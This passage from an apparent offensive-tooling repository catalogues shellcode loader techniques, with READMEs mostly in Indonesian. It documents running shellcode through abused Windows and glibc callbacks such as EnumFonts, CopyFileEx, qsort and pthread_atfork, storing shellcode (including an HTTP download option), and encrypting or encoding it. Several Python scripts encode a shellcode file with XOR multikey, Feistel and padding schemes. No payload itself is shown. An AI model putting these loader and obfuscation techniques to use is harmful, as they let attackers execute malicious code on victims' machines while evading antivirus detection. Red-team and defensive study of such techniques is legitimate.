12 | int EnumFontsW (HDC hdc, LPCWSTR lpLogfont, FONTENUMPROCW lpProc, LPARAM lParam);
13 | 
14 | HDC GetDC (HWND hWnd);
15 | ```
16 | 
17 | ### Reference 
18 | 
19 | - [MSDN EnumFontsA](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enumfontsa)
20 | - [MSDN EnumFontsW](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enumfontsw)
21 | - [MSDN GetDC](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getdc)


--------------------------------------------------------------------------------
/windows/storage/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | ### Overview
 4 | 
 5 | Teknik dalam `storage` adalah teknik yang digunakan untuk menyimpan shellcode sebelum dijalankan di memory. Shellcode dapat disimpan secara tersemat atau tertanam dalam loader, atau berada di luar loader sehingga harus didapatkan terlebih dahulu.
 6 | 
 7 | ### Catalog
 8 | 
 9 | Beberapa teknik `storage` yang diimplementasikan:
10 | 
11 | - [download-http](download-http): mengunduh shellcode dari HTTP
12 | - [global](global): menyimpan shellcode pada bagian global area
13 | - [resource](resource): menyimpan shellcode pada bagian resource
14 | - [section](section): menyimpan shellcode sebagai section terpisah
15 | - [stack](stack): menyimpan shellcode pada stack sebuah fungsi


--------------------------------------------------------------------------------
/linux/execution/callback/qsort/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `qsort` (glibc).
 8 | 
 9 | Fungsi `qsort` mengimplementasikan pengurutan elemen array (sorting) menggunakan algoritma quick sort.
10 | 
11 | ```c++
12 | #include <stdlib.h>
13 | 
14 | typedef void (*callback_t)(const void *, const void *);
15 | 
16 | void qsort(void * base, size_t length, size_t size, callback_t comparator);
17 | ```
18 | 
19 | Dalam proses pengurutan, callback comparator akan dipanggil untuk setiap perbandingkan dua elemen. Callback ini dapat di-abuse untuk melakukan eksekusi shellcode.
20 | 
21 | ### Reference
22 | 
23 | - [Man 3](https://man7.org/linux/man-pages/man3/qsort.3.html)


--------------------------------------------------------------------------------
/linux/allocation/valloc/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Allocate memory for executing shellcode later.
 4 | 
 5 | ### Overview
 6 | 
 7 | Alokasi menggunakan `valloc`. Fungsi `valloc` bekerja dengan mengalokasikan block memory yang dimulai dari alamat kelipatan page. Secara teknis `valloc` sama dengan `memalign(sysconf(_SC_PAGESIZE), size)`.
 8 | 
 9 | Fungsi `valloc` mirip dengan `pvalloc` (lib `malloc.h`). Perbedaannya adalah `pvalloc` akan melakukan pembulatan size menjadi kelipatan dari ukuran page.
10 | 
11 | Sebagai catatan, `valloc` berstatus legacy dan digantikan dengan `aligned_alloc`.
12 | 
13 | ```c++
14 | #include <stdlib.h>
15 | 
16 | void * valloc(size_t size);
17 | ```
18 | 
19 | ### Reference
20 | 
21 | - [Man 3](https://linux.die.net/man/3/valloc)


--------------------------------------------------------------------------------
/windows/writing/encryption/block/blowfish/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Shellcode encryptoin.
 4 | 
 5 | ### Overview
 6 | 
 7 | Enkripsi `Blowfish` dengan implementasi pribadi tanpa menggunakan API pihak ketiga.
 8 | 
 9 | `Blowfish` merupakan block cipher dengan rentang ukuran kunci beragam dari 32-bit hingga 448-bit. Namun dalam contoh implementasi akan digunakan ukuran key 128-bit.
10 | 
11 | ### References
12 | 
13 | - [Reversing.ID Blowfish Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/Blowfish)
14 | - [Reversing.ID Blowfish Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/BlowFish/code.c)
15 | - [Wikipedia Blowfish](https://en.wikipedia.org/wiki/Blowfish_(cipher))


--------------------------------------------------------------------------------
/windows/writing/encryption/block/cipherunicorn-a/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader 
 2 | 
 3 | Shellcode encryption
 4 | 
 5 | ### Overview
 6 | 
 7 | Enkripsi `CIPHERUNICORN-A` dengan implementasi pribadi tanpa menggunakan API pihak ketiga.
 8 | 
 9 | `CIPHERUNICORN-A` memiliki beberapa opsi ukuran key, namun dalam contoh implementasi akan digunakan ukuran key 128-bit.
10 | 
11 | ### References
12 | 
13 | - [Reversing.ID CIPHERUNICORN-A Reference](https://github.com/ReversingID/Crypto-Reference/blob/master/References/Modern/Block-Cipher/CIPHERUNICORN-A)
14 | - [Reversing.ID CIPHERUNICORN-A Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/CIPHERUNICORN-A/code.c)
15 | - [Wikipedia CIPHERUNICORN-A](https://en.wikipedia.org/wiki/CIPHERUNICORN-A)


--------------------------------------------------------------------------------
/windows/execution/callback/CryptVerifyMessageSignature/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `CryptVerifyMessageSignature`.
 8 | 
 9 | ```c++
10 | BOOL CryptVerifyMessageSignature (PCRYPT_VERIFY_MESSAGE_PARA pVerifyPara, DWORD dwSignerIndex, const BYTE *pbSignedBlob, DWORD cbSignedBlob, BYTE *pbDecoded, DWORD *pcbDecoded, PCCERT_CONTEXT *ppSignerCert);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN CryptVerifyMessageSignature](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptverifymessagesignature)
16 | - [MSDN structure CRYPT_VERIFY_MESSAGE_PARA](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/ns-wincrypt-crypt_verify_message_para)


--------------------------------------------------------------------------------
/windows/execution/callback/DPA_DestroyCallback/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `DPA_EnumCallback`.
 8 | 
 9 | ```c++
10 | void DPA_DestroyCallback (HDPA hdpa, PFNDAENUMCALLBACK pfnCB, void *pData);
11 | 
12 | HDPA DPA_Create (int cItemGrow);
13 | 
14 | int DPA_InsertPtr (HDPA hdpa, int i, void *p);
15 | ```
16 | 
17 | ### Reference 
18 | 
19 | - [MSDN DPA_DestroyCallback](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dpa_destroycallback)
20 | - [MSDN DPA_Create](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dpa_create)
21 | - [MSDN DPA_InsertPtr](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dpa_insertptr)


--------------------------------------------------------------------------------
/linux/execution/callback/bsearch/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `bsearch` (glibc).
 8 | 
 9 | Fungsi `bsearch` mengimplementasikan pencarian elemen pada array terurut menggunakan algoritma binary search.
10 | 
11 | ```c++
12 | #include <stdlib.h>
13 | 
14 | typedef void (*callback_t)(const void *, const void *);
15 | 
16 | void* bsearch(const void *key, const void * base, size_t length, size_t size, callback_t comparator);
17 | ```
18 | 
19 | Dalam proses pencarian, callback comparator akan dipanggil untuk setiap elmeen. Callback ini dapat di-abuse untuk melakukan eksekusi shellcode.
20 | 
21 | ### Reference
22 | 
23 | - [Man 3](https://man7.org/linux/man-pages/man3/bsearch.3.html)


--------------------------------------------------------------------------------
/windows/execution/callback/CopyFileEx/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `CopyFileEx`.
 8 | 
 9 | ```c++
10 | BOOL CopyFileExA (LPCSTR lpExistingFileName, LPCSTR lpNewFileName, LPPROGRESS_ROUTINE lpProgressRoutine, LPVOID lpData, LPBOOL pbCancel, DWORD dwCopyFlags);
11 | 
12 | BOOL CopyFileExW (LPCWSTR lpExistingFileName, LPCWSTR lpNewFileName, LPPROGRESS_ROUTINE lpProgressRoutine, LPVOID lpData, LPBOOL pbCancel, DWORD dwCopyFlags);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN CopyFileExA](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-copyfileexa)
18 | - [MSDN CopyFileExW](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-copyfileexw)


--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceLanguages/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumResourceLanguages`.
 8 | 
 9 | ```c++
10 | BOOL EnumResourceLanguagesA(HMODULE hModule, LPCSTR lpType, LPCSTR lpName, ENUMRESLANGPROCA lpEnumFunc, LONG_PTR lParam);
11 | 
12 | BOOL EnumResourceLanguagesW(HMODULE hModule, LPCWSTR lpType, LPCWSTR lpName, ENUMRESLANGPROCW lpEnumFunc, LONG_PTR lParam);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN EnumResourceLanguagesA](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-enumresourcelanguagesa)
18 | - [MSDN EnumResourceLanguagesW](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-enumresourcelanguagesw)


--------------------------------------------------------------------------------
/windows/writing/encryption/block/anubis/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Shellcode encryption.
 4 | 
 5 | ### Overview
 6 | 
 7 | Enkripsi `Anubis` dengan implementasi pribadi tanpa menggunakan API pihak ketiga.
 8 | 
 9 | `Anubis` merupakan block cipher sebagai salah satu kontestan pada project NESSIE. Algoritma ini memiliki beberapa opsi ukuran key, namun dalam contoh implementasi akan digunakan ukuran key 128-bit.
10 | 
11 | ### References
12 | 
13 | - [Reversing.ID Anubis Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/Anubis)
14 | - [Reversing.ID Anubis Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/Anubis/code.c)
15 | - [Wikipedia Anubis](https://en.wikipedia.org/wiki/Anubis_(cipher))


--------------------------------------------------------------------------------
/linux/execution/event/pthread_atfork/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Executing shellcode at fork.
 4 | 
 5 | ### Overview
 6 | 
 7 | Daftarkan shellcode dengan handler `pthread_atfork` sehingga eksekusi secara otomatis saat fork terjadi.
 8 | 
 9 | ```sh
10 | #include <pthread.h>
11 | 
12 | typedef void (*callback_t)(void);
13 | 
14 | int pthread_atfork(callback_t prepare, callback_t parent, callback_t child);
15 | ```
16 | 
17 | Terdapat tiga handle yang bisa digunakan:
18 | - prepare: dieksekusi di parent process sesaat sebelum `fork` terjadi
19 | - parent: dieksekusi di parent process setelah `fork` selesai.
20 | - child: dieksekusi di child process setelah `fork` selesai.
21 | 
22 | ### Reference
23 | 
24 | - [Man 3](https://man7.org/linux/man-pages/man3/pthread_atfork.3.html)


--------------------------------------------------------------------------------
/windows/writing/custom/printable/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Transform the shellcode with custom algorithm.
 4 | 
 5 | ### Overview
 6 | 
 7 | Mengubah shellcode menjadi rangkaian karakter cetak (printable character) di ASCII, yakni bernilai pada rentang `0x20` hingga `0x7F`.
 8 | 
 9 | Algoritma ini bekerja dengan membagi setiap byte menjadi 2 nibble (4-bit) `L (Left)` dan `R (Right)` sehingga `B = L(B)<<4 | R(B)`.
10 | 
11 | Kemudian `L` dan `R` akan dipetakan ke rentang karakter cetak ASCII sebagai lower nibble dan sembarang nilai (0x2 - 0x6) sebagai high nibble.
12 | 
13 | Contoh:
14 | 
15 | ```
16 | B = 0x37
17 | L = 0x3
18 | R = 0x7
19 | B = 0x3<<4 | 0x7 = 0x37
20 | 
21 | encoded = 0x23 0x47
22 | ```
23 | 
24 | Sehingga, shellcode akan berukuran 2x lipat ukuran semula.
25 | 


--------------------------------------------------------------------------------
/windows/execution/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | ### Overview
 4 | 
 5 | Teknik `execution` adalah teknik menjalankan shellcode, baik secara langsung maupun tak langsung.
 6 | 
 7 | Teknik eksekusi dapat dibagi menjadi beberapa kategori berdasarkan karakteristik eksekusi:
 8 | 
 9 | - [asm-jmp](asm-jmp): lompat ke alamat shellcode secara langsung menggunakan intruksi assembly.
10 | - [callback](callback): menyalahgunakan API untuk memanggil shellcode sebagai callback.
11 | - [event](event): memanfaatkan trigger event
12 | - [exception](exception): menyalahgunakan sistem exception handling.
13 | - [fiber](fiber): eksekusi shellcode sebagai fiber baru
14 | - [invoke](invoke): eksekusi shellcode secara langsung tanpa API.
15 | - [thread](thread): eksekusi shellcode sebagai thread baru
16 | 


--------------------------------------------------------------------------------
/windows/writing/encryption/block/safer/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Shellcode encryptoin.
 4 | 
 5 | ### Overview
 6 | 
 7 | Enkripsi `SAFER+` (dari keluarga SAFER) dengan implementasi pribadi tanpa menggunakan API pihak ketiga.
 8 | 
 9 | `SAFER` merupakan block cipher sebagai salah satu kontestan pada project NESSIE. Algoritma ini memiliki beberapa opsi ukuran key, namun dalam contoh implementasi akan digunakan ukuran key 128-bit.
10 | 
11 | ### References
12 | 
13 | - [Reversing.ID SAFER Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/SAFER)
14 | - [Reversing.ID SAFER Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/SAFER/code.c)
15 | - [Wikipedia SAFER](https://en.wikipedia.org/wiki/SAFER_(cipher))


--------------------------------------------------------------------------------
/windows/execution/callback/DSA_DestroyCallback/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `DSA_DestroyCallback`.
 8 | 
 9 | ```c++
10 | void DSA_DestroyCallback (HDSA hdsa, PFNDAENUMCALLBACK pfnCB, void *pData);
11 | 
12 | HDSA DSA_Create (int cbItem, int cItemGrow);
13 | 
14 | int DSA_InsertItem (HDSA hdsa, int i, const void *pitem);
15 | ```
16 | 
17 | ### Reference 
18 | 
19 | - [MSDN DSA_DestroyCallback](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_destroycallback)
20 | - [MSDN DSA_Create](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_create)
21 | - [MSDN DSA_InsertItem](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_insertitem)


--------------------------------------------------------------------------------
/windows/execution/callback/SymFindFileInPath/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `SymFindFileInPath`.
 8 | 
 9 | ```c++
10 | BOOL IMAGEAPI SymFindFileInPath ( HANDLE hprocess, PCSTR SearchPath, PCSTR FileName, PVOID id, DWORD two, DWORD three, DWORD flags, PSTR FoundFile, PFINDFILEINPATHCALLBACK callback, PVOID context);
11 | 
12 | BOOL IMAGEAPI SymSrvGetFileIndexInfo (PCSTR File, PSYMSRV_INDEX_INFO Info, DWORD Flags);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN SymFindFileInPath](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-symfindfileinpath)
18 | - [MSDN SymSrvGetFileIndexInfo](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-symsrvgetfileindexinfo)


--------------------------------------------------------------------------------
/windows/execution/callback/EnumFontFamilies/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumFontFamilies`.
 8 | 
 9 | ```c++
10 | int EnumFontFamiliesA (HDC hdc, LPCSTR lpLogfont, FONTENUMPROCA lpProc, LPARAM lParam);
11 | 
12 | int EnumFontFamiliesW (HDC hdc, LPCWSTR lpLogfont, FONTENUMPROCW lpProc, LPARAM lParam);
13 | 
14 | HDC GetDC (HWND hWnd);
15 | ```
16 | 
17 | ### Reference 
18 | 
19 | - [MSDN EnumFontFamiliesA](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enumfontfamiliesa)
20 | - [MSDN EnumFontFamiliesW](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enumfontfamiliesw)
21 | - [MSDN GetDC](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getdc)


--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceTypes/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumResourceTypes`.
 8 | 
 9 | Enumerasi resource types di dalam module dan eksekusi callback untuk memproses tiap resource type yang diidentifikasi.
10 | 
11 | ```c++
12 | BOOL EnumResourceTypesA (HMODULE hModule, ENUMRESTYPEPROCA lpEnumFunc, LONG_PTR lParam);
13 | 
14 | BOOL EnumResourceTypesW (HMODULE hModule, ENUMRESTYPEPROCW lpEnumFunc, LONG_PTR lParam);
15 | ```
16 | 
17 | ### Reference 
18 | 
19 | - [MSDN EnumResourceTypesA](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-enumresourcetypesa)
20 | - [MSDN EnumResourceTypesW](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-enumresourcetypesw)


--------------------------------------------------------------------------------
/windows/execution/callback/CreatePropertySheetPage/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `CreatePropertySheetPage`.
 8 | 
 9 | ```c++
10 | HPROPSHEETPAGE CreatePropertySheetPageA (LPCPROPSHEETPAGEA constPropSheetPagePointer);
11 | 
12 | HPROPSHEETPAGE CreatePropertySheetPageW (LPCPROPSHEETPAGEW constPropSheetPagePointer);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN CreatePropertySheetPageA](https://docs.microsoft.com/en-us/windows/win32/api/prsht/nf-prsht-createpropertysheetpagea)
18 | - [MSDN CreatePropertySheetPageW](https://docs.microsoft.com/en-us/windows/win32/api/prsht/nf-prsht-createpropertysheetpagew)
19 | - [MSDN structure PROPSHEETPAGE](https://docs.microsoft.com/en-us/windows/win32/controls/pss-propsheetpage)


--------------------------------------------------------------------------------
/windows/execution/callback/EnumLanguageGroupLocales/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumLanguageGroupLocales`.
 8 | 
 9 | ```c++
10 | BOOL EnumLanguageGroupLocalesA (LANGGROUPLOCALE_ENUMPROCA lpLangGroupLocaleEnumProc, LGRPID LanguageGroup, DWORD dwFlags, LONG_PTR lParam);
11 | 
12 | BOOL EnumLanguageGroupLocalesW (LANGGROUPLOCALE_ENUMPROCW lpLangGroupLocaleEnumProc, LGRPID LanguageGroup, DWORD dwFlags, LONG_PTR lParam);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN EnumLanguageGroupLocalesA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumlanguagegrouplocalesa)
18 | - [MSDN EnumLanguageGroupLocalesW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumlanguagegrouplocalesw)


--------------------------------------------------------------------------------
/windows/writing/custom/padding-dynamic/c++/generate.py:
--------------------------------------------------------------------------------
 1 | # read shellcode from `shellcode.bin` and 
 2 | # generate the encoded shellcode
 3 | 
 4 | import random
 5 | 
 6 | with open("shellcode.bin", "rb") as f:
 7 |     shcode = f.read()
 8 | shlen = len(shcode)
 9 | 
10 | # encode the shellcode
11 | idx = 0
12 | enc_shcode = []
13 | 
14 | while idx < shlen:
15 |     # generate padding number in the range of (2..4)
16 |     pad = random.randrange(2, 5)
17 |     remainder = shlen - idx 
18 | 
19 |     if pad > remainder:
20 |         pad = remainder 
21 | 
22 |     enc_shcode.append(pad)
23 |     enc_shcode += shcode[idx:idx+pad]
24 |     idx += pad
25 | 
26 | # print as C-array
27 | print("{ ", end='')
28 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
29 | print(" }")
30 | print(f"Length: {len(enc_shcode)}")


--------------------------------------------------------------------------------
/windows/execution/callback/DialogBoxIndirectParam/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `DialogBoxIndirectParam`.
 8 | 
 9 | ```c++
10 | INT_PTR DialogBoxIndirectParamA (HINSTANCE hInstance, LPCDLGTEMPLATEA hDialogTemplate, HWND hWndParent, DLGPROC lpDialogFunc, LPARAM dwInitParam);
11 | 
12 | INT_PTR DialogBoxIndirectParamW (HINSTANCE hInstance, LPCDLGTEMPLATEW hDialogTemplate, HWND hWndParent, DLGPROC lpDialogFunc, LPARAM dwInitParam);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN DialogBoxIndirectParamA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-dialogboxindirectparama)
18 | - [MSDN DialogBoxIndirectParamW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-dialogboxindirectparamw)


--------------------------------------------------------------------------------
/windows/execution/callback/GetOpenFileName/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `GetOpenFileName`.
 8 | 
 9 | ```c++
10 | BOOL GetOpenFileNameA (LPOPENFILENAMEA param);
11 | 
12 | BOOL GetOpenFileNameW (LPOPENFILENAMEW param);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN GetOpenFileNameA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/nf-commdlg-getopenfilenamea)
18 | - [MSDN GetOpenFileNameW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/nf-commdlg-getopenfilenamew)
19 | - [MSDN structure OPENFILENAMEA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-openfilenamea)
20 | - [MSDN structure OPENFILENAMEW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-openfilenamew)


--------------------------------------------------------------------------------
/windows/execution/callback/GetSaveFileName/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `GetSaveFileName`.
 8 | 
 9 | ```c++
10 | BOOL GetSaveFileNameA (LPOPENFILENAMEA param);
11 | 
12 | BOOL GetSaveFileNameW (LPOPENFILENAMEW param);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN GetSaveFileNameA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/nf-commdlg-getsavefilenamea)
18 | - [MSDN GetSaveFileNameW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/nf-commdlg-getsavefilenamew)
19 | - [MSDN structure OPENFILENAMEA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-openfilenamea)
20 | - [MSDN structure OPENFILENAMEW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-openfilenamew)


--------------------------------------------------------------------------------
/windows/execution/thread/CreateThread/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Executing shellcode as a thread.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `CreateThread` dan tunggu hingga eksekusi tuntas dengan `WaitForSingleObject`.
 8 | 
 9 | ```c++
10 | HANDLE CreateThread (LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, __drv_aliasesMem LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);
11 | 
12 | DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN CreateThread](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread)
18 | - [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject)


--------------------------------------------------------------------------------
/windows/writing/custom/feistel/c++/generate.py:
--------------------------------------------------------------------------------
 1 | # read shellcode from `shellcode.bin` and 
 2 | # generate the encoded shellcode
 3 | 
 4 | import random
 5 | 
 6 | with open("shellcode.bin", "rb") as f:
 7 |     shcode = f.read()
 8 | shlen = len(shcode)
 9 | 
10 | # generate single byte key
11 | key = random.randrange(1, 255)
12 | 
13 | # make sure shellcode is even-length
14 | if shlen % 2 == 1:
15 |     shcode += b"\x00"
16 |     shlen  += 1
17 | 
18 | # process in feistel network
19 | enc_shcode = [key]
20 | idx = 0
21 | while idx < shlen:
22 |     l = shcode[idx]     # LEFT
23 |     r = shcode[idx+1]   # RIGHT
24 | 
25 |     enc_shcode.append(r)
26 |     enc_shcode.append(l ^ key)
27 |     idx += 2
28 | 
29 | # print as C-array
30 | print("{ ", end='')
31 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
32 | print(" }")


--------------------------------------------------------------------------------
/windows/execution/callback/EnumFontFamiliesEx/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumFontFamiliesEx`.
 8 | 
 9 | ```c++
10 | int EnumFontFamiliesExA(HDC hdc, LPLOGFONTA lpLogfont, FONTENUMPROCA lpProc, LPARAM lParam, DWORD dwFlags);
11 | 
12 | int EnumFontFamiliesExA(HDC hdc, LPLOGFONTW lpLogfont, FONTENUMPROCW lpProc, LPARAM lParam, DWORD dwFlags);
13 | 
14 | HDC GetDC (HWND hWnd);
15 | ```
16 | 
17 | ### Reference 
18 | 
19 | - [MSDN EnumFontFamiliesExA](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enumfontfamiliesexa)
20 | - [MSDN EnumFontFamiliesExW](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enumfontfamiliesexw)
21 | - [MSDN GetDC](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getdc)


--------------------------------------------------------------------------------
/windows/writing/custom/xor-multikey/c++/generate.py:
--------------------------------------------------------------------------------
 1 | # read shellcode from `shellcode.bin` and 
 2 | # generate the encoded shellcode
 3 | 
 4 | import random
 5 | 
 6 | stride = random.randrange(4,8)
 7 | 
 8 | with open("shellcode.bin", "rb") as f:
 9 |     shcode = f.read()
10 | 
11 | nblock  = len(shcode) // stride
12 | remainder = len(shcode) % stride
13 | idx_s   = 0
14 | 
15 | # padding
16 | if remainder != 0:
17 |     shcode = shcode + b"\x90"*(stride - remainder)
18 |     nblock += 1
19 | 
20 | enc_shcode = [nblock, stride]
21 | 
22 | for idx_n in range(nblock):
23 |     key = random.randrange(1, 255)
24 | 
25 |     enc_shcode += [key] + [ c ^ key for c in shcode[idx_s : idx_s + stride]]
26 |     idx_s += stride
27 | 
28 | # print as C-array
29 | print("{ ", end='')
30 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
31 | print(" }")


--------------------------------------------------------------------------------
/linux/execution/callback/scandir/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `scandir` (glibc).
 8 | 
 9 | Fungsi `scandir` adalah fungsi POSIX yang digunakan untuk memindai (scan) isi dari sebuah direktori. Terdapat dua buah callback yang dapat digunakan:
10 | 
11 | - `filter` untuk menentukan apakah entry layak / memenuhi kriteria.
12 | - `compare` untuk mengurutkan entry.
13 | 
14 | ```c++
15 | #include <dirent.h>
16 | 
17 | typedef int (*cb_filter_t)(const struct dirent *);
18 | typedef int (*cb_compare_t)(const struct dirent **, const struct dirent **);
19 | 
20 | int scandir (const char * dirp, struct dirent *** result, cb_filter_t filter, cb_compare_t compare);
21 | ```
22 | 
23 | ### Reference
24 | 
25 | - [Man 3](https://man7.org/linux/man-pages/man3/scandir.3.html)


--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceNames/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
